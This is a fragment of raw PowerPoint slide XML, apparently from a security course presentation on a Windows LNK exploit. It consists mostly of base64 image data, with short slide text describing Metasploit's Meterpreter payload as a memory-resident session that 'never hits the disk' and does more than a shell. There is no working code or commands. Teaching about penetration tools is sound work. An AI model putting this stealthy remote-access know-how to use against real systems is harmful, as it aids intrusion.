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1266" name="Picture 2" descr="http://samsclass.info/123/proj10/LNK-3-sessi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24000" y="3124200"/>
            <a:ext cx="7315200" cy="333375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33251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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MEtasploit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7975" y="1143000"/>
            <a:ext cx="8181974" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Gain a session using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		Rather than a “classic” Windows Command Prompt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Memory based/never hits the disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Everything a shell can do plus extra</a:t>
            </a:r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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,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